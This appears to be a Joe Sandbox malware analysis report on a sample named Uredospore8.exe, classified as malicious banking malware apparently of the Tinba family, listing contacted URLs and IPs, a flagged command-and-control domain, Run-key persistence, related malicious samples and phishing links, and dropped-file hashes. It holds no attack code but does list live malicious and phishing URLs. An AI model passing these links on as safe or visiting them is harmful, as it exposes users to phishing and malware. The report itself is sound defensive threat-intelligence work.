https://api.msn.com/	explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.activity.windows.com	svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz"	SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817"	SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com	svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.office.com/M365.Access394866fc-eedb-4f01-8536-3ff84b16be2a72f988bf-86f1-41af-91ab-2d	SearchApp.exe, 0000000D.00000000.2325343319.0000027A916C8000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1"	SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei	explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.activity.windows.com/v1/assets/$batch	svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://%s.dnet.xboxlive.com	svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fb.me/react-polyfillsThis	SearchApp.exe, 0000000D.00000000.2281804728.0000027A7DEF0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xsts.auth.xboxlive.com/	svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
216.218.185.162	lkebgoxdejyq.com	United States		6939	HURRICANEUS	true
173.222.162.64	unknown	United States		35994	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1501381
Start date and time:	2024-08-29 20:35:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	30
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Uredospore8.exe
Detection:	MAL
Classification:	mal100.bank.evad.winEXE@13/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 87% Number of executed functions: 136 Number of non-executed functions: 113
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 192.229.221.95
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Uredospore8.exe

Simulations

Behavior and APIs

Time	Type	Description
14:36:11	API Interceptor	1x Sleep call for process: dllhost.exe modified
14:36:14	API Interceptor	507x Sleep call for process: explorer.exe modified
20:36:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run E6B93DA9 C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe
20:36:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run E6B93DA9 C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
216.218.185.162	7Y18r(201).exe	Get hash	malicious	Tinba	Browse	elitiorecfreetoo.cc/el0hjkd76ghs65dhj0it/
	bX77X1kv3X.exe	Get hash	malicious	Tinba	Browse	elitiorecfreetoo.cc/el0hjkd76ghs65dhj0it/
	RgZaLjgCto.exe	Get hash	malicious	Tinba	Browse	sotdecjvilon.pw/EiDQjNbWEQ/
	java.exe	Get hash	malicious	Tinba	Browse	gfnlmtcolrrb.pw/EiDQjNbWEQ/
	java.exe	Get hash	malicious	Tinba	Browse	fccfxejgtpqb.pw/EiDQjNbWEQ/
	PrintWiz.exe	Get hash	malicious	Tinba	Browse	pxscpwnnqujq.net/el0hjkd76ghs65dhj0it/
	java.exe	Get hash	malicious	Tinba	Browse	cmnsgscccrej.pw/EiDQjNbWEQ/
	3G36K54KKw.exe	Get hash	malicious	Tinba	Browse	ve0t182er814kok.cc/vet0up7gj67sdhjd17up0er/
	http://hbjtorutqkl.org	Get hash	malicious	Unknown	Browse	hbjtorutqkl.org/
	http://www.paypr.com	Get hash	malicious	Unknown	Browse	www.paypr.com/
173.222.162.64	r1kArkKGjW.exe	Get hash	malicious	Sality	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.google.com	https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?7-797967704b5369323074665079536e4f53696c4e536374495330724e4c4d38764c386f734d6741436f367a554c434d6a45304e446f2f4c537a4879396773543031474b396c4e51796651413d-cGllcnBvbnRAdW1jdS5vcmcN&c=E,1,wbWD82FzAB2JeezUv_orUrFt9Y6xAwP1SFd-LxGbn5lFQUR-ICnh2bVD8KxUbI-o1WHs4m_jH3oIrcrCtckuIPjOPE2z7IJMic3gcfP66riD2fyrofyEXyw,&typo=1	Get hash	malicious	HTMLPhisher	Browse	216.58.206.68
	http://my.manychat.com/	Get hash	malicious	Unknown	Browse	216.58.206.68
	https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	172.217.23.100
	https://cx.surveysensum.com/fd3Butxp	Get hash	malicious	Unknown	Browse	172.217.18.100
	http://idtyvfyfmst.weebly.com	Get hash	malicious	HTMLPhisher	Browse	142.250.185.132
	http://getquckbulck.top	Get hash	malicious	Unknown	Browse	142.250.184.228
	https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp	Get hash	malicious	Unknown	Browse	216.58.206.68
	http://passtcnet.homeunix.com/amj/2.mp4	Get hash	malicious	Unknown	Browse	216.58.212.132
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	142.250.185.100
	New Document from Community Insurance Center.html	Get hash	malicious	HTMLPhisher	Browse	142.250.185.68
fp2e7a.wpc.phicdn.net	RqYh.exe	Get hash	malicious	Remcos	Browse	192.229.221.95
	adbce.exe	Get hash	malicious	AZORult, Quasar, Ramnit	Browse	192.229.221.95
	http://my.manychat.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	SecuriteInfo.com.Win64.MalwareX-gen.10229.1578.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://idtyvfyfmst.weebly.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://getquckbulck.top	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://passtcnet.homeunix.com/amj/2.mp4	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://idtyvfyfmst.weebly.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://www.water-filter.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HURRICANEUS	SecuriteInfo.com.Linux.Siggen.9999.11438.19201.elf	Get hash	malicious	Mirai	Browse	23.175.182.5
	https://monogogo.info/JQJMLAWN#em=npaladino@bigge.com	Get hash	malicious	Phisher	Browse	66.220.23.67
	KKveTTgaAAsecNNaaaa.x86_64.elf	Get hash	malicious	Unknown	Browse	66.160.179.114
	xWTju4vS5W	Get hash	malicious	Mirai	Browse	65.19.140.221
	botx.mips.elf	Get hash	malicious	Mirai	Browse	184.75.246.154
	6df55c9e31f	Get hash	malicious	Unknown	Browse	72.52.87.65
	Account Statement #U2713 PC - ID 30781-20733-1691072748.htm	Get hash	malicious	Unknown	Browse	64.62.174.128
	7Y18r(201).exe	Get hash	malicious	Tinba	Browse	216.218.185.162
	JH1uPRWzzE.exe	Get hash	malicious	Remcos	Browse	216.218.135.118
	GU7Uk4pAQw.elf	Get hash	malicious	Unknown	Browse	65.49.39.194
AKAMAI-ASUS	https://cvccworks-my.sharepoint.com/:o:/g/personal/tbrosseau_cvccworks_edu/Eq-UyPVcAplCp0EtULhG-vgBSBG-0YnvqRHIOFaj8gAVeA?e=0GtZle&c=E,1,DChFGbEapD80-9FdFFEzIgnps7b6noVGZQKGJYQxe5NZ1bO4xoHQSXTZoDZYFQom26YXPkpXr4g-Zcy6HwaX1DHyE-5Bk2WBwo9od82Z27DPdBWYzulyG2zvnA,,&typo=1	Get hash	malicious	HTMLPhisher	Browse	184.28.89.164
	https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp	Get hash	malicious	Unknown	Browse	23.197.9.160
	file.exe	Get hash	malicious	Unknown	Browse	23.223.209.213
	http://www.water-filter.com	Get hash	malicious	HTMLPhisher	Browse	23.216.205.249
	https://rebrand.ly/340957	Get hash	malicious	Unknown	Browse	2.19.126.211
	SecuriteInfo.com.Linux.Siggen.9999.6015.2041.elf	Get hash	malicious	Mirai	Browse	23.9.6.205
	file.exe	Get hash	malicious	Unknown	Browse	23.223.209.207
	OJO!!! No lo he abiertoFwd_ Message From 646___xbx2.eml	Get hash	malicious	Unknown	Browse	2.19.126.151
	https://eu-files.jotform.com/jufs/Balciunas/form_files/mayeri.66cdabd2a5f975.43943309.pdf?md5=MSrOXntTEwGBrCuETzXGIw&expires=1724764002	Get hash	malicious	Unknown	Browse	23.47.168.24
	https://netorgft2865359-my.sharepoint.com/:w:/g/personal/paula_inspectpacificnorthwest_com/EXL0GdLzCipEl-iSFFMt7pcBeQ1wBcmGHhi03qs1BFCH1A?e=bI7Q02	Get hash	malicious	HTMLPhisher	Browse	23.210.123.218

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1138de370e523e824bbca92d049a3777	http://my.manychat.com/	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://getquckbulck.top	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://idtyvfyfmst.weebly.com	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	sxs.exe	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://general72.s3-website.us-east-2.amazonaws.com	Get hash	malicious	Unknown	Browse	173.222.162.64
	http://premium.davidabostic.com	Get hash	malicious	Unknown	Browse	173.222.162.64
	https://gocloud.co.ke/ShareDocu.php/?email=cmFjaGVsakBjb21wbHl3b3Jrcy5jb20=	Get hash	malicious	Captcha Phish, HTMLPhisher	Browse	173.222.162.64
	https://set.page/cdtautomotive/	Get hash	malicious	Unknown	Browse	173.222.162.64
	Invoice.htm	Get hash	malicious	HTMLPhisher	Browse	173.222.162.64
	https://tinyurl.com/NDCEurope	Get hash	malicious	Unknown	Browse	173.222.162.64

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db-wal

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	modified
Size (bytes):	197760
Entropy (8bit):	4.866785967822446
Encrypted:	false
SSDEEP:	3072:fGNZuHktDm5NZvtDm0HqA98hQwtX9eCLNZZ:f2
MD5:	B57284F9565D4A17842059AE3BC3F54F
SHA1:	7DDBD4594B6A2CACE6C345D9801A12E14981CE0B
SHA-256:	DD486716CAC9303A7615528E92FD021ECEA82600605CF1FAACC3F9E63C9E16EA
SHA-512:	1949FC5BCACF7F4D3AB00699F4CF43C2B16B9FD53ECB66160468B1B10974314B3486A118B3CADC48C9C8D7CC7241DE79A9B2FB73D6CBB39B9A566443A32D7813
Malicious:	false
Preview:	........N..g#.M.p..N..z......v..l.c.Z.Q.H.?.................z.q.h._.V.M.D.;.2.). ...................................~.u.....................................y.p.g.^.U.L.C.:.1.(.............6.-.$.........................}.t.k.b.Y.P.G.>.5...........,.#...........................v..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	data
Category:	dropped
Size (bytes):	524288
Entropy (8bit):	2.357495641270052
Encrypted:	false
SSDEEP:	1536:jG5pG9g1Ui91X2dQlp6gOnrJOnoeOQ2fQdDQX2khHB1eO5o4QOGSvmNzHr1u:jG5qg1Ui91X2M6tnrQnvu1R5LfvyH
MD5:	04F8FAF99879D22CE27F3C57EFD94D66
SHA1:	EC30A8F6A6411D858B13BC2B323274AD30B4B761
SHA-256:	912C9D680D5F75E8FFA3D5A1321B6B7D0D3133AF40F679062635718886CA298D
SHA-512:	27DE687E0F36B360191E8129A8578BE080BC867A8A3A987D7A0DA63EB963B328AD338FC92DD287579C2AD3C3832D1DDB5B19B4B798C3E7797335E83A5CC9A3D1
Malicious:	false
Preview:	...............+...{o..!...{..........<...T.;....{..................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\..........................................................................................................................................................................................................C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\...........................................................................................................................................................................................................0u.............................................y..............Tz+.#......... ..........Y.......h.z.......x.......gN;....{..................C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.W.e.b.C.a.c.h.e.\.W.e.b.C.a.c.h.e.V.0.1...d.a.t......................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x813b72d3, page size 32768, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	17301504
Entropy (8bit):	1.0289497054122378
Encrypted:	false
SSDEEP:	6144:bvQPYV7AyUO+xBGA611GJxBGA611Gv0M6JwX3XX35X3khTAdhTA/hTATX3t8nMkP:QyUv3F0TmT0TAivKxK/UdOC4Ago
MD5:	BEA789C0FB745AD5A88DEDE66AA1ACD9
SHA1:	0A983EC0588FF60B769F9F7A7328BFF9887ACC32
SHA-256:	B5AC0D7A54C894EA50A53619F74797E439466F035DECFAB427CF38323D94FA2F
SHA-512:	893C6385EB57EEB534A7A9BDFC742F3256FE41325EEAAB92698BF44032535B54C6D971EA609FA43368A622BE8CA3DE450BE002C5FABCA34EB9ADFC0A583C656A
Malicious:	false
Preview:	.;r.... .......4.........gN;....{........................&....../...{...$...\|..h.(.........................T.;....{..............................................................................................Y...........eJ......n........................................................................................................... ........+...{o..............................................................................................................................................................................................!...{..................................J=.2.$...\|......................$...\|...........................#......h.(.....................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm

Download File

Process:	C:\Windows\System32\dllhost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.1339377237772169
Encrypted:	false
SSDEEP:	6:5l//uuB4tZ9+mAuHcvqUA//AL9wjXlFkFRFlYC0p23nGC:7//uuOUmAcUA//fLlePFlYC1
MD5:	ECA2A2478094DD50C5B3688BC76A4810
SHA1:	DA5CA8E560313F942D5CA6382A7F106098884018
SHA-256:	33B233E1EA588F5826801D886405A9C5A0FC46A26B0BCE6CA04CF6955648E031
SHA-512:	7549EBDDDF3CE2D9F01EBA850DD1251A1DEC0908D2DD9E6B1369CC76114A948336602B12E907F8FE2A46ADAE03CD0842D13A63081C849E9211C9399AE8E50D1D
Malicious:	false
Preview:	.@......................................;....{...$...\|.../...{...........$...\|.../...{..J=.2.$...\|..................m....$...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	6.6601655582141035
Encrypted:	false
SSDEEP:	6:zYDnUpUGgtzgX5o7IpP/pUGlgn4zSEcbcrwT53aOhDsmTUuAaC:c6nX5FmnPbbDzUiC
MD5:	8CB9827076979C302C958D9FFA0BE384
SHA1:	2FB4F94A67AA32AAEC9388FD0EC12D54DD382901
SHA-256:	3CCD3133AE1D81268CB85059E3CC7626E4301D6D894CF736A5BBEE07E04EA981
SHA-512:	1A4C67EA85661879EF5A28EB177C79D86114B50D0C6385676E1BD81760E463CB879C878572C1D45C87F105FF0E986086AE59E6200D56B9AA8268BCB6A3AA8BBE
Malicious:	false
Preview:	0..4......-0..)..+.....0......0...0........H.....6A..cib).K...20240828213503Z0s0q0I0...+..........G+~..w.#.....W.....H.....6A..cib).K....9=H..BZ\|..........20240828213503Z....20240904213503Z0...*.H.=....g.0d.0?.wR.=@...`.P..4G...g..).ld.o. Ln....7...r..pH..0e..3.....b....m.H.l...%..f ^....0.;......:%BDTP-

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	data
Category:	dropped
Size (bytes):	400
Entropy (8bit):	3.9727768533118155
Encrypted:	false
SSDEEP:	6:kKsUNBcc7ih/o8XLNfOAUMivhClroFp736ZWx8GrZoAK+SosEwmPcbLOarUuJn:979yjbNmxMiv8sFpT6er+OwmUeeL
MD5:	B0141F21FCEDEEE039EA324BF6BD54F7
SHA1:	C8BE931970AEF1694B3CD2047A83E27E55B3936B
SHA-256:	18A7DFA3FDF07B40CF0DF4008E915C74E206AC5C530DBAE2F04D3FB3882B9A97
SHA-512:	7C22466D46FE4AD390DB685694FB2F4C80A8619464A478B59D57BC5E423CA44AB47791226E3723E52321145D80EED6EFC56BA5BE87E90EDCDBDED7E4B4079186
Malicious:	false
Preview:	p...... ........,..RB...(.................F$......M......................M.... ...........5... ...............8...h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.r.j.r.y.d.R.y.t.%.2.B.A.p.F.3.G.S.P.y.p.f.H.B.x.R.5.X.t.Q.Q.U.s.9.t.I.p.P.m.h.x.d.i.u.N.k.H.M.E.W.N.p.Y.i.m.8.S.8.Y.C.E.A.I.5.P.U.j.X.A.k.J.a.f.L.Q.c.A.A.s.O.1.8.o.%.3.D...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\DQECM999\www.bing[1].xml

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	Unicode text, UTF-8 text, with very long lines (46777), with no line terminators
Category:	dropped
Size (bytes):	46787
Entropy (8bit):	5.029975757081771
Encrypted:	false
SSDEEP:	768:ugSmLA70brltXp6t1bYyldTYSWeaG05AqC:ugSiVq
MD5:	0D8BF8D92E6F92E7999EA2557DC864FA
SHA1:	762E3905BAEF0351A173A28EE68D77E424D0EA3F
SHA-256:	A85890A5BB568983BE69A2066A08A70FDE1CDB54618CDF286AB147AF912215FA
SHA-512:	942E9A3869B66C60FE1A060502E4FFBE4A29C27DC04E216886249B7970314A8C28461AA378363C5C7B4EC4A753470861045EF6A1B464E8E62E0A4707A69C2A45
Malicious:	false
Preview:	<root><item name="eventLogQueue_Online" value="[]" ltime="1328467908" htime="31128139" /><item name="eventLogQueue_Online_logUploadIntervalStartDate" value="1696486689403" ltime="3067956944" htime="31061843" /><item name="eventLogQueue_Online_uploadedLogSizeInInterval" value="0" ltime="3067958019" htime="31061843" /><item name="newUsersLogged" value="1" ltime="475910539" htime="31061844" /><item name="cohortProfile" value="[{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},{"date":null,"count":0},

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\0.0.filtertrie.intermediate.txt

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	37172
Entropy (8bit):	4.611586117106773
Encrypted:	false
SSDEEP:	768:6UjQxwcuyEZDqRRmJHGHWy84ye0EaFHm2iLfOXYcc2jZ:b6y5U0Jky4yed+vUfOoujZ
MD5:	CB72E7C0DB487BF29ED4E057EB202FED
SHA1:	1BE1CE4D77688E02AEE53617D201B2A425A660C7
SHA-256:	23321B90885C63CE1F098CC2220E36462A7050CC2D722FB1FE799982305FE1CA
SHA-512:	FECE29D5E5D4BC448EC1CAD726A7FF3CAB733A07DBA8221253D7F2D08258B6F549F783339C8F46147C2F94AF1F9545877D6C961245DC0274ED050281269206AC
Malicious:	false
Preview:	0.0....~.....~.....~.....~.....~.....~...~.....~.....~.....~.......~......~.......~.....~.....~.....~.....~......~.....~......~......~.......~.....~......~.....~.......~.......~......~.....~......~.......~.....~......~.....~.....~......~......~.....~......~.....~.............~.......~...md~...alc~..zune~..zord~..znip~..zip help~..zip file manager~..yourphone~..your phone~..yhis pc~..y pc~..y computer~..xxbox~..xox~..xontrol panel~..xonreol~..xnox~..xnipping~..xms~..xmd~..xls:wux:xls~..xhrome~..xcontrol~..xcmd~..xchrome~..xcalc~..xbxox~..xbv~..xbpx~..xboz~..xbox~..xboxx~..xboxc~..xbos~..xbop~..xboox~..xboix~..xboc~..xbob~..xbix~..xbb~..xamera~..xalc~..x86)~..x64)~..x box~..wyc~..wxcwl~..wxcel~..wword~..wsord~..wsnip~..wrord~..wrod~..wrodpad~..wqord~..wprd~..wprdpad~..wpord~..wowrd~..wotrd~..wotd~..wo

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\0.1.filtertrie.intermediate.txt

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Dy:W
MD5:	34BD1DFB9F72CF4F86E6DF6DA0A9E49A
SHA1:	5F96D66F33C81C0B10DF2128D3860E3CB7E89563
SHA-256:	8E1E6A3D56796A245D0C7B0849548932FEE803BBDB03F6E289495830E017F14C
SHA-512:	E3787DE7C4BC70CA62234D9A4CDC6BD665BFFA66DEBE3851EE3E8E49E7498B9F1CBC01294BF5E9F75DE13FB78D05879E82FA4B89EE45623FE5BF7AC7E48EDA96
Malicious:	false
Preview:	0.1..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\0.2.filtertrie.intermediate.txt

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Ay:Ay
MD5:	C204E9FAAF8565AD333828BEFF2D786E
SHA1:	7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
SHA-256:	D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
SHA-512:	E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
Malicious:	false
Preview:	0.2..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\Apps.ft

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	DIY-Thermocam raw data (Lepton 3.x), scale 0-11, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 42206150440647454097408.000000, slope 18791449852801685565186347368448.000000
Category:	dropped
Size (bytes):	50075
Entropy (8bit):	3.7518830531435827
Encrypted:	false
SSDEEP:	1536:xchkq/9PYdKNAd1d0f41w1Ii0OyAAZXjLdk6nMUMXfhteVoVPPP8zo9dhk5+6DC3:xykq/1YdKNAd1d0f41w1Ii5yAAZXHdet
